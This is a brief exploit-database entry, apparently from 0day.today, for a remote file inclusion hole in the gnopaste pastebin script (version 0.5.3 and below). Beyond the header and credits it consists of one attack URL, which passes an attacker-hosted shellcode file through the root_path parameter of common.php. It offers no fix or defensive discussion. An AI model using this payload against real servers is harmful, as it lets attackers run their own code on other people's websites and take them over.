id: 467
date: 05/29/2006
title: gnopaste <= 0.5.3 (common.php) Remote File Include Vulnerability
author: SmokeZ
cves: 

================================================================
gnopaste <= 0.5.3 (common.php) Remote File Include Vulnerability
================================================================



# gnopaste <= 0.5.3 - Remote File Include Vulnerabilities
# Script site: http://sourceforge.net/projects/gnopaste
# made by SmokeZ (smoke.hes@gmail.com)

http://www.site.com/[gnopaste_path]/includes/common.php?root_path=SHELLCODE_URL.txt?



#  0day.today [2023-03-24]  #